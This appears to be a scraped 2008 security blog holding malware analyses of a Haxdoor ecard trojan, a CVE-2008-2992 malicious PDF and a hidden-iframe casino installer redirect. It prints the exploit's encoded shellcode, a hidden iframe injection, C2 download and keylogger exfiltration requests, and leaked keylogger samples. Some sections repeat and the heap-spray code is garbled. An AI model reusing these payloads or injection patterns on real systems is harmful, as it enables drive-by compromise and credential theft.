On 11 November 2008, I received an email indicating that I had received an ecard.
Date: Tue, 11 Nov 2008 19:29:36 +0000
From: "123greetings.com" (spoofed)
To: "my love" <.....@gmail.com>
Subject: You have received an eCard
Good day.
You have received an eCard
To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):
hxxp://zonzamas.info/ecard.exe
Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!
We hope you enjoy you eCard.
Thank You!
hxxp://www.123greetings.com
The email included a hyperlink for hxxp://zonzamas.info/ecard.exe. The file ecard.exe is a variant of the Haxdoor malcode family. The domain zonzamas.info is currently registered and hosted in the US (65.98.31.250).
ecard.exe
934fce496508b5dc4ba01f140870d01c
34,440 bytes
The malware ecard.exe creates the following files:
C:\WINDOWS\system32\gzipmod.dll
C:\WINDOWS\system32\vbagz.sys
gzipmod.dll
603ed7f0758bb2957aa94b3e7bd758b2
20,108 bytes
vbagz.sys
3aec76486842e41459e1edd79570b224
7,072 bytes
Both Haxdoor files install as rootkits hiding themselves from the Windows API.
>SSDT State
NtCreateProcess
Actual Address 0xF8B0CFE9
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtCreateProcessEx
Actual Address 0xF8B0CA86
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtOpenKey
Actual Address 0xF8B0C467
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtOpenProcess
Actual Address 0xF8B0C799
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtQueryDirectoryFile
Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys
>Files
Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
Suspect File: C:\WINDOWS\system32\vbagz.sys Status: Hidden
>Hooks
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
ntoskrnl.exe-->IoGetCurrentProcess, Type: Inline - RelativeJump at address 0x804EDE00 hook handler located in [vbagz.sys]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1724]svchost.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump at address 0x77F55669 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpOpenRequestA, Type: Inline - RelativeJump at address 0x76206C0A hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetConnectA, Type: Inline - RelativeJump at address 0x76205DE6 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetOpenA, Type: Inline - RelativeJump at address 0x7621017D hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
!!POSSIBLE ROOTKIT ACTIVITY DETECTED!! =)
The malware gzipmod.dll creates:
C:\WINDOWS\System32\ answxt.bin
C:\WINDOWS\System32\k86.bin
K86.bin stores keylogger data. The following log shows examples of logon attempts at USBank and Wachovia.
00000159 00000159 0 ==================Google - Microsoft Internet Explorer ; MOD:C:\Program Files\Internet Explorer\iexplore.exe
000001C7 000001C7 0 usbank Enter 123456671988wachovia Enter 1234567 Tab pass123usbank Enter 12121212pass123456
The following registry keys are created to load gzipmod.dll at startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
Persistent = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gzipmod
DllName = "gzipmod.dll"
Startup = "gzipmod"
Impersonate = 0x00000001
Asynchronous = 0x00000001
MaxWait = 0x00000001
adr9i = "[6B1ADFD9D971359EA]"
The following registry keys are created to load vbagz.sys during a safe-mode boot:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
The following registry entries are set, affecting internet security:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32
The following registry entries install vbagz.sys as a service named “VBA2 PnP Driver”
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "DisplayName"
Type: REG_SZ
Data: VBA2 PnP Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Type: REG_EXPAND_SZ
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_VBAGZ\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Security "Security"
Type: REG_BINARY
Data: [hexadecimal values]
The malware connects to cash-babules.com/bolt2/data.php?trackid. The domain cash-babules.com is registered and hosted in Russia (62.167.16.11, SINGER-NET). The request returns instructions to download hxxp://sergej-grienko.com/inj/11-11.bin. The domain sergej-grienko.com is also registered and hosted in Russia (62.167.16.11, SINGER-NET). The 11-11.bin file is saved as C:\WINDOWS\System32\tremir.bin. The bin file stores instructions for creating fake banking institution logon html pages and keylogger triggers.
GET /ie-bolt2/data.php?trackid=[string] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: cash-babules.com Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 12 Nov 2008 03:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.6
CMND UU0 U4hxxp://sergej-grienko.com/inj/11-11.bin
U4sergej-grienko.com/inj/11-11.bin ED |END
GET /inj/11-11.bin HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: sergej-grienko.com
Keylogger and harvested data is exfiltrated to cash-babules.com/ie-bolt2/data.php.
POST /ie-bolt2/data.php?dt=0&id=4569 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.11731-201935)
Host: cash-babules.com
Content-Length: 725
Content-Type: multipart/form-data; boundary=---------------------------
Connection: Keep-Alive
Pragma: no-cache
Content-Disposition: form-data; name="user" [string]
Content-Disposition: form-data; name="info"
Wednesday, November 12, 2008
CVE-2008-2992 Adobe PDF Exploitation
On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by CORE Security technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.
Exploit Analysis:
The site infonews.ath.cx hosted the malicious PDF file data.pdf (hxxp://infonews.ath.cx/data.pdf). The domain ath.cx is controlled by five name servers at dyndns.org. Dynamic DNS (DDNS) allows individuals to create a hostname that points to his/her dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.
ns1.dyndns.org 63.208.196.90
ns2.dyndns.org 204.13.249.75
ns3.dyndns.org 208.78.69.75
ns4.dyndns.org 91.198.22.75
ns5.dyndns.org 203.62.195.75
At the time of exploit, infonews.ath.cx resolved to 85.17.162.100 located in the Netherlands.
inetnum: 85.17.162.0 - 85.17.162.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to mailto:"abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
source: RIPE # Filtered
The IP 85.17.162.100 currently maps to 19 domains.
*.adrefer.net
*.adxdnet.net
*.kasdfps.net
ad.adrefer.net
adrefer.net
adxcnet.net
adxdnet.net
awltovhc.net
espads.net
especialads.com
ikwlkad.net
infonews.ath.cx
iwdjiamk.net
kasdfps.net
kiafjwo.net
netcrefer.net
ssa.adxdnet.net
tqlkg.net
www.kasdfps.net
data.pdf
84bc91579cd4dbee7faf3ee09c4a9a4b
10179
The malicious PDF file includes objects that contain document-level JavaScript.
00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj
The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.
var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937
%u4949%u4949%u4949%u4949%u4949%u5a51%u656a%u5058%u4230%u4231%u6b41%u4141%u4175%u4132%u3241
%u4142%u4230%u5841%u4138%u5042%u4d75%u7939%u4d6c%u5038%u4344%u4530%u3550%u4c50%u714b%u5555
%u4c6c%u414b%u736c%u4135%u6368%u6a31%u6c4f%u524b%u766f%u6c78%u414b%u674f%u6450%u6841%u726b
%u6e69%u546b%u6c74%u374b%u5871%u706e%u6b31%u6e70%u4e79%u4b4c%u3934%u7350%u5744%u6f77%u6931
%u565a%u776d%u6871%u3842%u396b%u4564%u416b%u4444%u6364%u5434%u4935%u6e75%u636b%u416f%u3534
%u7a51%u514b%u6e76%u346b%u304c%u6e4b%u416b%u754f%u354c%u6a51%u6e4b%u476b%u6e6c%u436b%u7a31
%u4c4b%u7349%u516c%u5634%u4b64%u3073%u4f31%u5230%u4e44%u736b%u4470%u4c70%u5945%u4150%u3468
%u4c4c%u634b%u4670%u4c6c%u524b%u5750%u6e6c%u6c4d%u504b%u3768%u6a78%u574b%u6c79%u6b4b%u4e30
%u7750%u7770%u4370%u6c30%u754b%u5738%u614c%u544f%u7871%u5376%u5650%u6c36%u7949%u4e68%u6b63
%u5170%u566b%u3230%u6c48%u4d30%u675a%u4374%u356f%u4f38%u7968%u4d6e%u765a%u706e%u4b57%u4d4f
%u7237%u344d%u7333%u5258%u5054%u5761%u4150%u7278%u6354%u4244%u6450%u767a%u364f%u624f%u5341
%u3154%u4368%u7054%u316e%u3175%u7464%u326e%u524e%u7345%u6444%u426f%u7043%u706f%u3564%u3435
%u516f%u3263%u4352%u7045%u646e%u346e%u3530%u5438%u7530%u6550");
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">
The shellcode execution results in a GET request for hxxp://adxdnet.net/code/srun.php. The domain adxdnet.net is hosted at 85.17.162.100 (same IP as infonews.ath.cx).
The adxdnet.net/code/srun.php request returns obfuscated JavaScript. The image reference for hxxp://fc.webmasterpro.de/as_noscript.php?name=load3 is for tracking purposes.
The decoded script reveals a redirect to adxdnet.net/code/srun.php?req
var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }
if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
xobj.send(null);
response = xobj.responseText;
}
if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}
The adxdnet.net/code/srun.php?req request returns content for additional binary downloads.
GET /code/srun.php?req HTTP/1.1
request: srun
Referer: http://adxdnet.net/code/srun.php
Host: adxdnet.net
Six minutes later, a GET request for ssa.adxdnet.net/get.php?src=xpre occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.
GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)
Host: ssa.adxdnet.net
hxxp://ssa.adxdnet.net/get.php?src=xpre
hxxp://ssa.adxdnet.net/get.php?src=prun
hxxp://ssa.adxdnet.net/get.php?src=wavvsnet
hxxp://ssa.adxdnet.net/get.php?src=snapsnet
hxxp://ssa.adxdnet.net/get.php?src=rasesnet
hxxp://ssa.adxdnet.net/get.php?src=searsnet
hxxp://ssa.adxdnet.net/get.php?src=incasnet
hxxp://ssa.adxdnet.net/get.php?src=winvsnet
The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.
GET /code/const.php HTTP/1.1
Host: ssa.adxdnet.net
The downloaded malware installs a variety of crapware (rogue security products, adware, etc.)
Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472
Exploit Analysis:
The site infonews.ath.cx hosted the malicious PDF file data.pdf (hxxp://infonews.ath.cx/data.pdf). The domain ath.cx is controlled by five name servers at dyndns.org. Dynamic DNS (DDNS) allows individuals to create a hostname that points to his/her dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.
ns1.dyndns.org 63.208.196.90
ns2.dyndns.org 204.13.249.75
ns3.dyndns.org 208.78.69.75
ns4.dyndns.org 91.198.22.75
ns5.dyndns.org 203.62.195.75
At the time of exploit, infonews.ath.cx resolved to 85.17.162.100 located in the Netherlands.
inetnum: 85.17.162.0 - 85.17.162.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to mailto:"abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
source: RIPE # Filtered
The IP 85.17.162.100 currently maps to 19 domains.
*.adrefer.net
*.adxdnet.net
*.kasdfps.net
ad.adrefer.net
adrefer.net
adxcnet.net
adxdnet.net
awltovhc.net
espads.net
especialads.com
ikwlkad.net
infonews.ath.cx
iwdjiamk.net
kasdfps.net
kiafjwo.net
netcrefer.net
ssa.adxdnet.net
tqlkg.net
www.kasdfps.net
data.pdf
84bc91579cd4dbee7faf3ee09c4a9a4b
10179
The malicious PDF file includes objects that contain document-level JavaScript.
00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj
The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.
var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937
%u4949%u4949%u4949%u4949%u4949%u5a51%u656a%u5058%u4230%u4231%u6b41%u4141%u4175%u4132%u3241
%u4142%u4230%u5841%u4138%u5042%u4d75%u7939%u4d6c%u5038%u4344%u4530%u3550%u4c50%u714b%u5555
%u4c6c%u414b%u736c%u4135%u6368%u6a31%u6c4f%u524b%u766f%u6c78%u414b%u674f%u6450%u6841%u726b
%u6e69%u546b%u6c74%u374b%u5871%u706e%u6b31%u6e70%u4e79%u4b4c%u3934%u7350%u5744%u6f77%u6931
%u565a%u776d%u6871%u3842%u396b%u4564%u416b%u4444%u6364%u5434%u4935%u6e75%u636b%u416f%u3534
%u7a51%u514b%u6e76%u346b%u304c%u6e4b%u416b%u754f%u354c%u6a51%u6e4b%u476b%u6e6c%u436b%u7a31
%u4c4b%u7349%u516c%u5634%u4b64%u3073%u4f31%u5230%u4e44%u736b%u4470%u4c70%u5945%u4150%u3468
%u4c4c%u634b%u4670%u4c6c%u524b%u5750%u6e6c%u6c4d%u504b%u3768%u6a78%u574b%u6c79%u6b4b%u4e30
%u7750%u7770%u4370%u6c30%u754b%u5738%u614c%u544f%u7871%u5376%u5650%u6c36%u7949%u4e68%u6b63
%u5170%u566b%u3230%u6c48%u4d30%u675a%u4374%u356f%u4f38%u7968%u4d6e%u765a%u706e%u4b57%u4d4f
%u7237%u344d%u7333%u5258%u5054%u5761%u4150%u7278%u6354%u4244%u6450%u767a%u364f%u624f%u5341
%u3154%u4368%u7054%u316e%u3175%u7464%u326e%u524e%u7345%u6444%u426f%u7043%u706f%u3564%u3435
%u516f%u3263%u4352%u7045%u646e%u346e%u3530%u5438%u7530%u6550");
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">
The shellcode execution results in a GET request for hxxp://adxdnet.net/code/srun.php. The domain adxdnet.net is hosted at 85.17.162.100 (same IP as infonews.ath.cx).
The adxdnet.net/code/srun.php request returns obfuscated JavaScript. The image reference for hxxp://fc.webmasterpro.de/as_noscript.php?name=load3 is for tracking purposes.
The decoded script reveals a redirect to adxdnet.net/code/srun.php?req
var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }
if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
xobj.send(null);
response = xobj.responseText;
}
if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}
The adxdnet.net/code/srun.php?req request returns content for additional binary downloads.
GET /code/srun.php?req HTTP/1.1
request: srun
Referer: http://adxdnet.net/code/srun.php
Host: adxdnet.net
Six minutes later, a GET request for ssa.adxdnet.net/get.php?src=xpre occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.
GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)
Host: ssa.adxdnet.net
hxxp://ssa.adxdnet.net/get.php?src=xpre
hxxp://ssa.adxdnet.net/get.php?src=prun
hxxp://ssa.adxdnet.net/get.php?src=wavvsnet
hxxp://ssa.adxdnet.net/get.php?src=snapsnet
hxxp://ssa.adxdnet.net/get.php?src=rasesnet
hxxp://ssa.adxdnet.net/get.php?src=searsnet
hxxp://ssa.adxdnet.net/get.php?src=incasnet
hxxp://ssa.adxdnet.net/get.php?src=winvsnet
The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.
GET /code/const.php HTTP/1.1
Host: ssa.adxdnet.net
The downloaded malware installs a variety of crapware (rogue security products, adware, etc.)
Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472
Labels:
Adobe PDF,
adxdnet.net,
buffer overflow,
CVE-2008-2992
Gold VIP Club Casino
On 9 November 2008, a college university web page hosted obfuscated JavaScript that when decoded revealed an iframe to hxxp://amhvcketn.com/ld/ment/ (66.232.111.112). The following analysis tracks the redirect results.
<div style="visibility:hidden"><iframe src="hxxp://amhvcketn.com/ld/ment/" width=100 height=80></iframe></div>
The hxxp://amhvcketn.com/ld/ment/ request returned an HTTP 302 redirect to hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat
The hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat request returned an HTTP 302 redirect to hxxp://for777daily.com/479/.
The hxxp://for777daily.com/479/ request returned advertising content for a Gold Casino promotion.
“Download” and “Play Now!” buttons download hxxp://for777daily.com/479/SmartDownload.exe
<a href="SmartDownload.exe"><img src="images/download.gif" width="271" height="83" alt="" border="0"></a>
<a href="SmartDownload.exe"><img src="images/playnow.gif" width="96" height="124" alt="" border="0"></a>
Domain Analysis:
amhvcketn.com is registered in RU and 66.232.111.112 is registered to NOC4Hosts Inc., US.
Several other malicious domains resolved to 66.232.111.112 at the time of analysis.
adk2lev.com
aqlgdjeni.com
avegeni.com
biedetn.com
bov2bllev.com
brzgeni.com
dfn2etn.com
fhp4etn.com
fqmgdjeni.com
frzvetn.com
giqgetn.com
gsagcketn.com
gsajetn.com
htb4cketn.com
htbgetn.com
ikfjcketn.com
iucvetn.com
jlgvcketn.com
for777daily.com is registered in RU and 58.20.129.158 is registered in China.
SmartDownload.exe Analysis:
SmartDownload.exe
ea93453c6392e17fc3f858dd1d08b7f3
466,752 bytes
Upon execution SmartDownload.exe creates the C:\Program Files\Gold VIP Club Casino directory and opens an installer window.
SmartDownload.exe connects to locator.realtimegaming.com (200.122.168.237) on TCP port 20000 to receive C2. The client sends the string “Gold VIP Club Casino” and receives the string “200.122.168.189”. A second connection returns the string hxxp://download.realtimegaming.com/cdn/goldvipclub. The client connects to download.realtimegaming.com which uses Akamai caching to download the installation files package_list.ini.crc and package_list.ini.zip.
GET /cdn/goldvipclub/package_list.ini.crc HTTP/1.1 Host: download.realtimegaming.com
GET /cdn/goldvipclub/package_list.ini.zip HTTP/1.1 Host: download.realtimegaming.com
The domain realtimegaming.com is registered to RealTime Gaming Holding Company, LLC (Costa Rica).
Reverse lookups for 200.122.168.237 rotate through several casino themed domains.
affiliateglobal.clubusacasino.com
mycasinoaccounts.com
affiliateglobal.clubusacasino.net
api.mycasinoaccounts.com
integrations.mycasinoaccounts.com
www.mycasinoaccounts.com
cs.realtimegaming.com
globalaffiliates.betmaxcasino.com
The following major files are created.
c:\Program Files\Gold VIP Club Casino\casino.dll
27cc0f7692c95d15a43b8e1221cb2e3f
745,472 bytes
c:\Program Files\Gold VIP Club Casino\casino.exe
7bcfafbe500a3b440e9b18431997022a
30,720 bytes
The following major registry keys are added to launch Gold VIP Club Casino at statup.
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816} "(Default)"
Type: REG_SZ
Data: Gold Vip Club Casino
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\LocalServer32 "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\ProgID "(Default)"
Type: REG_SZ
Data: rtg.goldvipclub
HKEY_CLASSES_ROOT\rtg.goldvipclub "(Default)"
Type: REG_SZ
Data: URL: Realtime Gaming Protocol
HKEY_CLASSES_ROOT\rtg.goldvipclub "URL Protocol"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID "(Default)"
Type: REG_SZ
Data: {0CBAA404-8C7F-4070-8E42-8847E2394816}
HKEY_CLASSES_ROOT\rtg.goldvipclub\DefaultIcon "(Default)"
Type: REG_SZ
Data: casino.exe
HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gold VIP Club Casino "DisplayName"
Type: REG_SZ
Data: Gold VIP Club Casino
The launching of Gold VIP Club Casino initiates a connection to 200.122.168.189 TCP port 22053. The casino game requires an account to be created and personal information provided. Not sure how much I would trust a game that was installed through obfuscated JavaScript, a series of redirects and deceptive advertising :)
<div style="visibility:hidden"><iframe src="hxxp://amhvcketn.com/ld/ment/" width=100 height=80></iframe></div>
The hxxp://amhvcketn.com/ld/ment/ request returned an HTTP 302 redirect to hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat
The hxxp://amhvcketn.com/cgi-bin/index.cgi?mentat request returned an HTTP 302 redirect to hxxp://for777daily.com/479/.
The hxxp://for777daily.com/479/ request returned advertising content for a Gold Casino promotion.
“Download” and “Play Now!” buttons download hxxp://for777daily.com/479/SmartDownload.exe
<a href="SmartDownload.exe"><img src="images/download.gif" width="271" height="83" alt="" border="0"></a>
<a href="SmartDownload.exe"><img src="images/playnow.gif" width="96" height="124" alt="" border="0"></a>
Domain Analysis:
amhvcketn.com is registered in RU and 66.232.111.112 is registered to NOC4Hosts Inc., US.
Several other malicious domains resolved to 66.232.111.112 at the time of analysis.
adk2lev.com
aqlgdjeni.com
avegeni.com
biedetn.com
bov2bllev.com
brzgeni.com
dfn2etn.com
fhp4etn.com
fqmgdjeni.com
frzvetn.com
giqgetn.com
gsagcketn.com
gsajetn.com
htb4cketn.com
htbgetn.com
ikfjcketn.com
iucvetn.com
jlgvcketn.com
for777daily.com is registered in RU and 58.20.129.158 is registered in China.
SmartDownload.exe Analysis:
SmartDownload.exe
ea93453c6392e17fc3f858dd1d08b7f3
466,752 bytes
Upon execution SmartDownload.exe creates the C:\Program Files\Gold VIP Club Casino directory and opens an installer window.
SmartDownload.exe connects to locator.realtimegaming.com (200.122.168.237) on TCP port 20000 to receive C2. The client sends the string “Gold VIP Club Casino” and receives the string “200.122.168.189”. A second connection returns the string hxxp://download.realtimegaming.com/cdn/goldvipclub. The client connects to download.realtimegaming.com which uses Akamai caching to download the installation files package_list.ini.crc and package_list.ini.zip.
GET /cdn/goldvipclub/package_list.ini.crc HTTP/1.1 Host: download.realtimegaming.com
GET /cdn/goldvipclub/package_list.ini.zip HTTP/1.1 Host: download.realtimegaming.com
The domain realtimegaming.com is registered to RealTime Gaming Holding Company, LLC (Costa Rica).
Reverse lookups for 200.122.168.237 rotate through several casino themed domains.
affiliateglobal.clubusacasino.com
mycasinoaccounts.com
affiliateglobal.clubusacasino.net
api.mycasinoaccounts.com
integrations.mycasinoaccounts.com
www.mycasinoaccounts.com
cs.realtimegaming.com
globalaffiliates.betmaxcasino.com
The following major files are created.
c:\Program Files\Gold VIP Club Casino\casino.dll
27cc0f7692c95d15a43b8e1221cb2e3f
745,472 bytes
c:\Program Files\Gold VIP Club Casino\casino.exe
